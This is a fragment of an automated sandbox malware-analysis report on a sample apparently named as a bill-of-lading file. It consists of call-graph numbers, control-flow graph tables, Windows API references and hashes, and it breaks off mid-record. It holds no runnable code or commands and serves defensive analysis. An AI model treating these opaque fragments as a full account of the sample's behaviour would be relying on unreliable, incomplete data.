39521->39588 39522->39497 39526 d08630 MoveFileA 39525->39526 39528 d086cf 39526->39528 39528->39499 39530 6370865 39529->39530 39542 63713d0 39530->39542 39548 63713bb 39530->39548 39531 6370299 39534 6378300 39531->39534 39538 63782f0 39531->39538 39535 6378308 39534->39535 39537 637832b 39535->39537 39579 6377d7c 39535->39579 39537->39509 39540 6378300 39538->39540 39539 6377d7c KiUserCallbackDispatcher 39539->39540 39540->39539 39541 637832b 39540->39541 39541->39509 39543 63713fb 39542->39543 39554 6371931 39543->39554 39544 637147e 39545 63714aa 39544->39545 39546 6370804 GetModuleHandleW 39544->39546 39545->39545 39546->39545 39549 63713d0 39548->39549 39553 6371931 GetModuleHandleW 39549->39553 39550 637147e 39551 63714aa 39550->39551 39552 6370804 GetModuleHandleW 39550->39552 39551->39551 39552->39551 39553->39550 39555 637196d 39554->39555 39556 63719ee 39555->39556 39559 6371f17 39555->39559 39567 6371fa6 39555->39567 39560 6371f22 39559->39560 39575 6370804 39560->39575 39562 6372042 39563 6370804 GetModuleHandleW 39562->39563 39566 63720bc 39562->39566 39564 6372090 39563->39564 39565 6370804 GetModuleHandleW 39564->39565 39564->39566 39565->39566 39566->39556 39568 6371fdf 39567->39568 39569 6370804 GetModuleHandleW 39568->39569 39570 6372042 39569->39570 39571 6370804 GetModuleHandleW 39570->39571 39574 63720bc 39570->39574 39572 6372090 39571->39572 39573 6370804 GetModuleHandleW 39572->39573 39572->39574 39573->39574 39574->39556 39576 63721f0 GetModuleHandleW 39575->39576 39578 6372265 39576->39578 39578->39562 39580 6378340 KiUserCallbackDispatcher 39579->39580 39582 63783ae 39580->39582 39582->39535 39585 63df4f5 39583->39585 39584 63df70a 39584->39522 39585->39584 39586 63df97c GlobalMemoryStatusEx GlobalMemoryStatusEx 39585->39586 39587 63df720 GlobalMemoryStatusEx GlobalMemoryStatusEx 39585->39587 39586->39585 39587->39585 39590 63df4f5 39588->39590 39589 63df70a 39589->39522 39590->39589 39591 63df97c GlobalMemoryStatusEx GlobalMemoryStatusEx 39590->39591 39592 63df720 GlobalMemoryStatusEx GlobalMemoryStatusEx 39590->39592 39591->39590 39592->39590 39593 cbd030 39594 cbd048 39593->39594 39595 cbd0a2 39594->39595 39603 6373450 39594->39603 39607 6377952 39594->39607 39616 6373592 39594->39616 39626 63734a2 39594->39626 39631 6371bb7 39594->39631 39641 6371b9c 39594->39641 39649 6373440 39594->39649 39604 6373476 39603->39604 39605 6371b9c CallWindowProcW 39604->39605 39606 6373497 39605->39606 39606->39595 39608 637795a 39607->39608 39610 637796a 39607->39610 39608->39595 39609 63779e1 39613 63779df 39609->39613 39661 6376adc 39609->39661 39610->39609 39612 63779d1 39610->39612 39653 6377af8 39612->39653 39657 6377b08 39612->39657 39617 63735a0 39616->39617 39618 6370804 GetModuleHandleW 39617->39618 39619 6373657 39617->39619 39618->39619 39620 63779e1 39619->39620 39622 63779d1 39619->39622 39621 6376adc CallWindowProcW 39620->39621 39623 63779df 39620->39623 39621->39623 39624 6377af8 CallWindowProcW 39622->39624 39625 6377b08 CallWindowProcW 39622->39625 39624->39623 39625->39623 39627 6373474 39626->39627 39628 63734aa 39626->39628 39629 6371b9c CallWindowProcW 39627->39629 39628->39595 39630 6373497 39629->39630 39630->39595 39636 6371ba5 39631->39636 39632 63779e1 39633 63779df 39632->39633 39634 6376adc CallWindowProcW 39632->39634 39634->39633 39635 63779d1 39639 6377af8 CallWindowProcW 39635->39639 39640 6377b08 CallWindowProcW 39635->39640 39637 6370804 GetModuleHandleW 39636->39637 39638 6371ba7 39636->39638 39637->39638 39638->39632 39638->39635 39639->39633 39640->39633 39642 6371ba7 39641->39642 39643 63779e1 39642->39643 39646 63779d1 39642->39646 39644 63779df 39643->39644 39645 6376adc CallWindowProcW 39643->39645 39645->39644 39647 6377af8 CallWindowProcW 39646->39647 39648 6377b08 CallWindowProcW 39646->39648 39647->39644 39648->39644 39650 6373450 39649->39650 39651 6371b9c CallWindowProcW 39650->39651 39652 6373497 39651->39652 39652->39595 39654 6377b08 39653->39654 39655 6376adc CallWindowProcW 39654->39655 39656 6377bee 39654->39656 39655->39654 39656->39613 39658 6377b16 39657->39658 39659 6376adc CallWindowProcW 39658->39659 39660 6377bee 39658->39660 39659->39658 39660->39613 39662 6376ae7 39661->39662 39663 6377ca2 CallWindowProcW 39662->39663 39664 6377c51 39662->39664 39663->39664 39664->39613 39471 6373298 39472 6373300 CreateWindowExW 39471->39472 39474 63733bc 39472->39474 39475 63787b8 39476 63787c3 39475->39476 39477 63787d3 39476->39477 39479 6377fb4 39476->39479 39480 6378808 OleInitialize 39479->39480 39481 637886c 39480->39481 39481->39477 39665 6376b28 39666 6376b29 GetCurrentProcess 39665->39666 39668 6376bc0 GetCurrentThread 39666->39668 39669 6376bb9 39666->39669 39670 6376bf6 39668->39670 39671 6376bfd GetCurrentProcess 39668->39671 39669->39668 39670->39671 39674 6376c33 39671->39674 39672 6376c5b GetCurrentThreadId 39673 6376c8c 39672->39673 39674->39672

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 125 63d3018-63d3039 126 63d303b-63d303e 125->126 127 63d3064-63d3067 126->127 128 63d3040-63d305f 126->128 129 63d306d-63d308c 127->129 130 63d3808-63d380a 127->130 128->127 138 63d308e-63d3091 129->138 139 63d30a5-63d30af 129->139 131 63d380c 130->131 132 63d3811-63d3814 130->132 131->132 132->126 134 63d381a-63d3823 132->134 138->139 140 63d3093-63d30a3 138->140 143 63d30b5-63d30c4 139->143 140->143 251 63d30c6 call 63d3838 143->251 252 63d30c6 call 63d3831 143->252 144 63d30cb-63d30d0 145 63d30dd-63d33ba 144->145 146 63d30d2-63d30d8 144->146 167 63d37fa-63d3807 145->167 168 63d33c0-63d346f 145->168 146->134 177 63d3498 168->177 178 63d3471-63d3496 168->178 180 63d34a1-63d34b4 177->180 178->180 182 63d34ba-63d34dc 180->182 183 63d37e1-63d37ed 180->183 182->183 186 63d34e2-63d34ec 182->186 183->168 184 63d37f3 183->184 184->167 186->183 187 63d34f2-63d34fd 186->187 187->183 188 63d3503-63d35d9 187->188 200 63d35db-63d35dd 188->200 201 63d35e7-63d3617 188->201 200->201 205 63d3619-63d361b 201->205 206 63d3625-63d3631 201->206 205->206 207 63d3691-63d3695 206->207 208 63d3633-63d3637 206->208 209 63d369b-63d36d7 207->209 210 63d37d2-63d37db 207->210 208->207 211 63d3639-63d3663 208->211 221 63d36d9-63d36db 209->221 222 63d36e5-63d36f3 209->222 210->183 210->188 218 63d3665-63d3667 211->218 219 63d3671-63d368e 211->219 218->219 219->207 221->222 225 63d370a-63d3715 222->225 226 63d36f5-63d3700 222->226 230 63d372d-63d373e 225->230 231 63d3717-63d371d 225->231 226->225 229 63d3702 226->229 229->225 235 63d3756-63d3762 230->235 236 63d3740-63d3746 230->236 232 63d371f 231->232 233 63d3721-63d3723 231->233 232->230 233->230 240 63d377a-63d37cb 235->240 241 63d3764-63d376a 235->241 237 63d3748 236->237 238 63d374a-63d374c 236->238 237->235 238->235 240->210 242 63d376c 241->242 243 63d376e-63d3770 241->243 242->240 243->240 251->144 252->144
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $kq$$kq$$kq$$kq$$kq$$kq
                                    • API String ID: 0-1342094364
                                    • Opcode ID: 478cc51986748dedef6edcc4d6cf907730871d1ca2c3b92de7571a68c77b5461
                                    • Instruction ID: 3b5782bb21fc4ee48d3edaab202b01f84f142a60647541c0bda0c7e055e92815
                                    • Opcode Fuzzy Hash: 478cc51986748dedef6edcc4d6cf907730871d1ca2c3b92de7571a68c77b5461
                                    • Instruction Fuzzy Hash: E5325F35E1061ACFDB14EF78D89459DB7B6FF89300F20C65AD409A7264EB30AD85CB91

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 420 63dcec8-63dcee3 421 63dcee5-63dcee8 420->421 422 63dceea-63dceef 421->422 423 63dcef2-63dcef5 421->423 422->423 424 63dcf3e-63dcf41 423->424 425 63dcef7-63dcf39 423->425 426 63dcf8a-63dcf8d 424->426 427 63dcf43-63dcf85 424->427 425->424 428 63dcf8f-63dcfd1 426->428 429 63dcfd6-63dcfd9 426->429 427->426 428->429 431 63dcfe8-63dcfeb 429->431 432 63dcfdb-63dcfdd 429->432 437 63dcfed-63dd02f 431->437 438 63dd034-63dd037 431->438 435 63dd26f-63dd278 432->435 436 63dcfe3 432->436 440 63dd27a-63dd27f 435->440 441 63dd287-63dd293 435->441 436->431 437->438 443 63dd039-63dd07b 438->443 444 63dd080-63dd083 438->444 440->441 446 63dd299-63dd2ad 441->446 447 63dd3a4-63dd3a9 441->447 443->444 450 63dd0cc-63dd0cf 444->450 451 63dd085-63dd0c7 444->451 468 63dd3b1 446->468 469 63dd2b3-63dd2c5 446->469 447->468 453 63dd118-63dd11b 450->453 454 63dd0d1-63dd113 450->454 451->450 456 63dd3b4-63dd3c0 453->456 457 63dd121-63dd124 453->457 454->453 471 63dd14c-63dd15b 456->471 472 63dd3c6-63dd6b3 456->472 466 63dd147-63dd14a 457->466 467 63dd126-63dd142 457->467 466->471 473 63dd193-63dd196 466->473 467->466 468->456 495 63dd2e9-63dd2eb 469->495 496 63dd2c7-63dd2cd 469->496 474 63dd15d-63dd162 471->474 475 63dd16a-63dd176 471->475 632 63dd6b9-63dd6bf 472->632 633 63dd8da-63dd8e4 472->633 485 63dd198-63dd19a 473->485 486 63dd1a5-63dd1a8 473->486 474->475 483 63dd17c-63dd18e 475->483 484 63dd8e5-63dd91e 475->484 483->473 513 63dd920-63dd923 484->513 485->468 492 63dd1a0 485->492 493 63dd1aa-63dd1ec 486->493 494 63dd1f1-63dd1f4 486->494 492->486 493->494 499 63dd1f6-63dd20c 494->499 500 63dd211-63dd214 494->500 508 63dd2f5-63dd301 495->508 505 63dd2cf 496->505 506 63dd2d1-63dd2dd 496->506 499->500 509 63dd25d-63dd25f 500->509 510 63dd216-63dd225 500->510 514 63dd2df-63dd2e7 505->514 506->514 530 63dd30f 508->530 531 63dd303-63dd30d 508->531 522 63dd266-63dd269 509->522 523 63dd261 509->523 519 63dd234-63dd240 510->519 520 63dd227-63dd22c 510->520 525 63dd925-63dd941 513->525 526 63dd946-63dd949 513->526 514->508 519->484 532 63dd246-63dd258 519->532 520->519 522->421 522->435 523->522 525->526 528 63dd97c-63dd97f 526->528 529 63dd94b-63dd977 526->529 537 63dd98e-63dd990 528->537 538 63dd981 call 63dda3d 528->538 529->528 540 63dd314-63dd316 530->540 531->540 532->509 544 63dd997-63dd99a 537->544 545 63dd992 537->545 549 63dd987-63dd989 538->549 540->468 543 63dd31c-63dd338 call 63d6110 540->543 562 63dd33a-63dd33f 543->562 563 63dd347-63dd353 543->563 544->513 551 63dd99c-63dd9ab 544->551 545->544 549->537 558 63dd9ad-63dda10 call 63d6110 551->558 559 63dda12-63dda27 551->559 558->559 562->563 563->447 565 63dd355-63dd3a2 563->565 565->468 634 63dd6ce-63dd6d7 632->634 635 63dd6c1-63dd6c6 632->635 634->484 636 63dd6dd-63dd6f0 634->636 635->634 638 63dd8ca-63dd8d4 636->638 639 63dd6f6-63dd6fc 636->639 638->632 638->633 640 63dd6fe-63dd703 639->640 641 63dd70b-63dd714 639->641 640->641 641->484 642 63dd71a-63dd73b 641->642 645 63dd73d-63dd742 642->645 646 63dd74a-63dd753 642->646 645->646 646->484 647 63dd759-63dd776 646->647 647->638 650 63dd77c-63dd782 647->650 650->484 651 63dd788-63dd7a1 650->651 653 63dd8bd-63dd8c4 651->653 654 63dd7a7-63dd7ce 651->654 653->638 653->650 654->484 657 63dd7d4-63dd7de 654->657 657->484 658 63dd7e4-63dd7fb 657->658 660 63dd7fd-63dd808 658->660 661 63dd80a-63dd825 658->661 660->661 661->653 666 63dd82b-63dd844 call 63d6110 661->666 670 63dd846-63dd84b 666->670 671 63dd853-63dd85c 666->671 670->671 671->484 672 63dd862-63dd8b6 671->672 672->653
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $kq$$kq$$kq
                                    • API String ID: 0-2086306503
                                    • Opcode ID: efe83ba88eb05e3f6c19856b023b38f8b6706bdea38cb51a81d8c41e1087f64f
                                    • Instruction ID: 03b094e30530be7055016754d9944542e3e3d9d9ce358580088a32337e2af90f
                                    • Opcode Fuzzy Hash: efe83ba88eb05e3f6c19856b023b38f8b6706bdea38cb51a81d8c41e1087f64f
                                    • Instruction Fuzzy Hash: A6622D30A002068FCB55EF68E590A5EB7F6FF85304B209968D4159F369DB75ED8ACBC0

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 726 63d78f8-63d7916 727 63d7918-63d791b 726->727 728 63d791d-63d7939 727->728 729 63d793e-63d7941 727->729 728->729 731 63d794e-63d7951 729->731 732 63d7943-63d794d 729->732 734 63d7968-63d796b 731->734 735 63d7953-63d7961 731->735 737 63d796d-63d7987 734->737 738 63d798c-63d798e 734->738 742 63d799e-63d79b4 735->742 743 63d7963 735->743 737->738 739 63d7995-63d7998 738->739 740 63d7990 738->740 739->727 739->742 740->739 747 63d7bcf-63d7bd9 742->747 748 63d79ba-63d79c3 742->748 743->734 749 63d79c9-63d79e6 748->749 750 63d7bda-63d7c0f 748->750 759 63d7bbc-63d7bc9 749->759 760 63d79ec-63d7a14 749->760 753 63d7c11-63d7c14 750->753 755 63d7c1a-63d7c26 753->755 756 63d7cc1-63d7cc4 753->756 761 63d7c31-63d7c33 755->761 757 63d7ce7-63d7cea 756->757 758 63d7cc6-63d7ce2 756->758 762 63d7f1f-63d7f21 757->762 763 63d7cf0-63d7cff 757->763 758->757 759->747 759->748 760->759 781 63d7a1a-63d7a23 760->781 764 63d7c4b-63d7c4f 761->764 765 63d7c35-63d7c3b 761->765 767 63d7f28-63d7f2b 762->767 768 63d7f23 762->768 778 63d7d1e-63d7d62 763->778 779 63d7d01-63d7d1c 763->779 772 63d7c5d 764->772 773 63d7c51-63d7c5b 764->773 770 63d7c3d 765->770 771 63d7c3f-63d7c41 765->771 767->753 774 63d7f31-63d7f3a 767->774 768->767 770->764 771->764 776 63d7c62-63d7c64 772->776 773->776 782 63d7c7b-63d7cb4 776->782 783 63d7c66-63d7c69 776->783 787 63d7d68-63d7d79 778->787 788 63d7ef3-63d7f09 778->788 779->778 781->750 785 63d7a29-63d7a45 781->785 782->763 806 63d7cb6-63d7cc0 782->806 783->774 793 63d7a4b-63d7a75 785->793 794 63d7baa-63d7bb6 785->794 797 63d7d7f-63d7d9c 787->797 798 63d7ede-63d7eed 787->798 788->762 810 63d7a7b-63d7aa3 793->810 811 63d7ba0-63d7ba5 793->811 794->759 794->781 797->798 809 63d7da2-63d7e98 call 63d6110 797->809 798->787 798->788 860 63d7e9a-63d7ea4 809->860 861 63d7ea6 809->861 810->811 817 63d7aa9-63d7ad7 810->817 811->794 817->811 823 63d7add-63d7ae6 817->823 823->811 824 63d7aec-63d7b1e 823->824 832 63d7b29-63d7b45 824->832 833 63d7b20-63d7b24 824->833 832->794 834 63d7b47-63d7b9e call 63d6110 832->834 833->811 836 63d7b26 833->836 834->794 836->832 862 63d7eab-63d7ead 860->862 861->862 862->798 863 63d7eaf-63d7eb4 862->863 864 63d7eb6-63d7ec0 863->864 865 63d7ec2 863->865 866 63d7ec7-63d7ec9 864->866 865->866 866->798 867 63d7ecb-63d7ed7 866->867 867->798
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $kq$$kq
                                    • API String ID: 0-3550614674
                                    • Opcode ID: f268af5b12f8338e4e24198af507c63521ec627dea825ef1cca6e141313a56b8
                                    • Instruction ID: fb52f5005dcb30291554f788ef289b256c85515e8eeaaffc47efc2bc5ed3e263
                                    • Opcode Fuzzy Hash: f268af5b12f8338e4e24198af507c63521ec627dea825ef1cca6e141313a56b8
                                    • Instruction Fuzzy Hash: EE029E31B102058FDB54DB65E5906AEB7F6FF85300F248529E4069B399EB35EC8ACBD0
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2d7631e69524c03306cec90d392af75300f7dee12942afc81d26c9facebe60b6
                                    • Instruction ID: d7ab8dca453841bd2094e2577b2175355931738fdce8571a1f8e9c2f20b5497d
                                    • Opcode Fuzzy Hash: 2d7631e69524c03306cec90d392af75300f7dee12942afc81d26c9facebe60b6
                                    • Instruction Fuzzy Hash: 68925735E002048FDB64DF68D584A5EB7F2FF45310F5488A9E909AB365DB35EE89CB80
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 9b64fa096f4f20a8ef1268d9a08e3a43824bf65f27eb2151a033695a0429e1a5
                                    • Instruction ID: c97d63725c2bebddcf52d8d92238db345c227c1bbfd4b8d5c1f566ec1de53fcd
                                    • Opcode Fuzzy Hash: 9b64fa096f4f20a8ef1268d9a08e3a43824bf65f27eb2151a033695a0429e1a5
                                    • Instruction Fuzzy Hash: 6B62CD35B002058FDB54DB68E551AAEB7F2EF86310F148429E426EB395DB35ED89CBC0
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 257e2db55dee6c7472e2e8124813e6b0b7825743611525de72a06874de773736
                                    • Instruction ID: 915b071523b82547ef5268644b6d2f6b6ded07061b70631527587c86f37bc2bf
                                    • Opcode Fuzzy Hash: 257e2db55dee6c7472e2e8124813e6b0b7825743611525de72a06874de773736
                                    • Instruction Fuzzy Hash: 0032AF35F202098FDF50DB68E990AAEB7B6EB89310F109525E405DB359DB34EC4ACB90
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d76b4d059732d2179fc50c4f8f4998f2e5b2a3a2dc98225727db397bbc7b152b
                                    • Instruction ID: 0a9a0e4a4efa27ad17a8f1bddfb0aabfcefd55dfc621de903735544d561ae245
                                    • Opcode Fuzzy Hash: d76b4d059732d2179fc50c4f8f4998f2e5b2a3a2dc98225727db397bbc7b152b
                                    • Instruction Fuzzy Hash: CC12D332F002059FDF60DB64E98076EB7B6EB85320F248429E8569B385DB34EC49CBD1
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7eb2cfb7c2bb45e649d106ba052632a726a67bcb5a861551bdf3ea1ec3ca1b09
                                    • Instruction ID: d2f18bd2a6734100147bb51dd321bd359e7b15588de704254f83d6d3a31deff4
                                    • Opcode Fuzzy Hash: 7eb2cfb7c2bb45e649d106ba052632a726a67bcb5a861551bdf3ea1ec3ca1b09
                                    • Instruction Fuzzy Hash: 8D228071E002098FDF64CB68E9907AEF7B6EB45310F218826E416DB395DB35DC89CB91

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 0 63da838-63da856 1 63da858-63da85b 0->1 2 63da85d-63da866 1->2 3 63da86b-63da86e 1->3 2->3 4 63da891-63da894 3->4 5 63da870-63da88c 3->5 6 63da8ae-63da8b1 4->6 7 63da896-63da8a9 4->7 5->4 9 63da8c5-63da8c8 6->9 10 63da8b3-63da8c0 6->10 7->6 12 63da8ca-63da8cf 9->12 13 63da8d2-63da8d5 9->13 10->9 12->13 16 63da8ef-63da8f2 13->16 17 63da8d7-63da8e0 13->17 20 63da8f8-63da8fb 16->20 21 63daa55-63daa5e 16->21 18 63daa6f-63daaa6 17->18 19 63da8e6-63da8ea 17->19 29 63daaa8-63daaab 18->29 19->16 22 63da8fd-63da901 20->22 23 63da90c-63da90e 20->23 21->17 24 63daa64-63daa6e 21->24 22->24 26 63da907 22->26 27 63da915-63da918 23->27 28 63da910 23->28 26->23 27->1 30 63da91e-63da942 27->30 28->27 31 63daaad-63daab1 29->31 32 63daab8-63daabb 29->32 48 63da948-63da957 30->48 49 63daa52 30->49 33 63daae7-63dab22 31->33 34 63daab3 31->34 35 63daabd-63daad9 32->35 36 63daade-63daae1 32->36 44 63dab28-63dab34 33->44 45 63dad15-63dad28 33->45 34->32 35->36 36->33 38 63dad4a-63dad4d 36->38 39 63dad4f-63dad59 38->39 40 63dad5a-63dad5d 38->40 46 63dad6c-63dad6e 40->46 47 63dad5f call 63dad90 40->47 60 63dab54-63dab98 44->60 61 63dab36-63dab4f 44->61 50 63dad2a 45->50 51 63dad75-63dad78 46->51 52 63dad70 46->52 55 63dad65-63dad67 47->55 58 63da96f-63da9aa call 63d6110 48->58 59 63da959-63da95f 48->59 49->21 62 63dad2b 50->62 51->29 56 63dad7e-63dad88 51->56 52->51 55->46 76 63da9ac-63da9b2 58->76 77 63da9c2-63da9d9 58->77 63 63da961 59->63 64 63da963-63da965 59->64 78 63dab9a-63dabac 60->78 79 63dabb4-63dabf3 60->79 61->50 62->62 63->58 64->58 80 63da9b4 76->80 81 63da9b6-63da9b8 76->81 90 63da9db-63da9e1 77->90 91 63da9f1-63daa02 77->91 78->79 85 63dabf9-63dacd4 call 63d6110 79->85 86 63dacda-63dacef 79->86 80->77 81->77 85->86 86->45 93 63da9e5-63da9e7 90->93 94 63da9e3 90->94 98 63daa1a-63daa4b 91->98 99 63daa04-63daa0a 91->99 93->91 94->91 98->49 100 63daa0c 99->100 101 63daa0e-63daa10 99->101 100->98 101->98
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq
                                    • API String ID: 0-1078448309
                                    • Opcode ID: 3806c81e72d369695cfac76abd9f3fbcdeb721f02c876633eb31636f8ef5d24d
                                    • Instruction ID: 4174c7760aeb7481b6d89a6181e3fa4cad9fdb693eeb7632ae45dc1f4d18ca2e
                                    • Opcode Fuzzy Hash: 3806c81e72d369695cfac76abd9f3fbcdeb721f02c876633eb31636f8ef5d24d
                                    • Instruction Fuzzy Hash: CAE19031F102498FCB65DB69E6906AEB7F6FF85300F208529D4059B359DB35E84ACBD0

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 253 6376aaf-6376ab1 254 6376ab3 253->254 255 6376a4e-6376aa8 253->255 257 6376ab5-6376ad3 254->257 258 6376b21-6376b3d 254->258 263 6376b41-6376bb7 GetCurrentProcess 257->263 264 6376ad5-6377c44 257->264 258->263 275 6376bc0-6376bf4 GetCurrentThread 263->275 276 6376bb9-6376bbf 263->276 270 6377cf4-6377d14 call 6371b9c 264->270 271 6377c4a-6377c4f 264->271 283 6377d17-6377d24 270->283 273 6377ca2-6377cda CallWindowProcW 271->273 274 6377c51-6377c88 271->274 278 6377ce3-6377cf2 273->278 279 6377cdc-6377ce2 273->279 288 6377c91-6377ca0 274->288 289 6377c8a-6377c90 274->289 280 6376bf6-6376bfc 275->280 281 6376bfd-6376c31 GetCurrentProcess 275->281 276->275 278->283 279->278 280->281 286 6376c33-6376c39 281->286 287 6376c3a-6376c55 call 6376cf8 281->287 286->287 293 6376c5b-6376c8a GetCurrentThreadId 287->293 288->283 289->288 294 6376c93-6376cf5 293->294 295 6376c8c-6376c92 293->295 295->294
                                    APIs
                                    • GetCurrentProcess.KERNEL32 ref: 06376BA6
                                    • GetCurrentThread.KERNEL32 ref: 06376BE3
                                    • GetCurrentProcess.KERNEL32 ref: 06376C20
                                    • GetCurrentThreadId.KERNEL32 ref: 06376C79
                                    • CallWindowProcW.USER32(?,?,?,?,?), ref: 06377CC9
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4144621319.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_6370000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID: Current$ProcessThread$CallProcWindow
                                    • String ID:
                                    • API String ID: 1744009068-0
                                    • Opcode ID: 5f18d3d4802b55cacf350eca505132ec0727bc12b1b75c92263d7945f1fe5518
                                    • Instruction ID: 04c5c6be9c2cb96d1f85c593f95ea2af684c5550dd7dab21c6e5695d19b5620d
                                    • Opcode Fuzzy Hash: 5f18d3d4802b55cacf350eca505132ec0727bc12b1b75c92263d7945f1fe5518
                                    • Instruction Fuzzy Hash: 8291BAB4D003498FCB50CFA9C848ADEBFF1EF49314F24845AE049A7261D734A984CFA5

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 303 6376b19-6376b20 304 6376b22-6376b28 303->304 305 6376b29-6376bb7 GetCurrentProcess 303->305 304->305 311 6376bc0-6376bf4 GetCurrentThread 305->311 312 6376bb9-6376bbf 305->312 313 6376bf6-6376bfc 311->313 314 6376bfd-6376c31 GetCurrentProcess 311->314 312->311 313->314 316 6376c33-6376c39 314->316 317 6376c3a-6376c55 call 6376cf8 314->317 316->317 320 6376c5b-6376c8a GetCurrentThreadId 317->320 321 6376c93-6376cf5 320->321 322 6376c8c-6376c92 320->322 322->321
                                    APIs
                                    • GetCurrentProcess.KERNEL32 ref: 06376BA6
                                    • GetCurrentThread.KERNEL32 ref: 06376BE3
                                    • GetCurrentProcess.KERNEL32 ref: 06376C20
                                    • GetCurrentThreadId.KERNEL32 ref: 06376C79
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4144621319.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_6370000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID: Current$ProcessThread
                                    • String ID:
                                    • API String ID: 2063062207-0
                                    • Opcode ID: 8ac29402b62e775799d5d3ffc56dfcd932db452ca2f9e52f167a9ee2662dbed9
                                    • Instruction ID: 73c1733559d95b7fbc537b9847dc8ab6f1ba405b2839fa98d86f3c812860ef4f
                                    • Opcode Fuzzy Hash: 8ac29402b62e775799d5d3ffc56dfcd932db452ca2f9e52f167a9ee2662dbed9
                                    • Instruction Fuzzy Hash: 005168B49007498FDB54DFAAD9487DEBFF1EF49304F20845AE049A7260D734A984CFA5

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 329 6376b28-6376bb7 GetCurrentProcess 335 6376bc0-6376bf4 GetCurrentThread 329->335 336 6376bb9-6376bbf 329->336 337 6376bf6-6376bfc 335->337 338 6376bfd-6376c31 GetCurrentProcess 335->338 336->335 337->338 340 6376c33-6376c39 338->340 341 6376c3a-6376c55 call 6376cf8 338->341 340->341 344 6376c5b-6376c8a GetCurrentThreadId 341->344 345 6376c93-6376cf5 344->345 346 6376c8c-6376c92 344->346 346->345
                                    APIs
                                    • GetCurrentProcess.KERNEL32 ref: 06376BA6
                                    • GetCurrentThread.KERNEL32 ref: 06376BE3
                                    • GetCurrentProcess.KERNEL32 ref: 06376C20
                                    • GetCurrentThreadId.KERNEL32 ref: 06376C79
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4144621319.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_6370000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID: Current$ProcessThread
                                    • String ID:
                                    • API String ID: 2063062207-0
                                    • Opcode ID: 1edfcb86390d18c8b0b3c8555d6bb492182742fe1ea4e2011b03415b8524fdf5
                                    • Instruction ID: 0a621c535a06ff2e69a9b5a8570e13aa128f6696b2adf67a40558d35bf9a0d0d
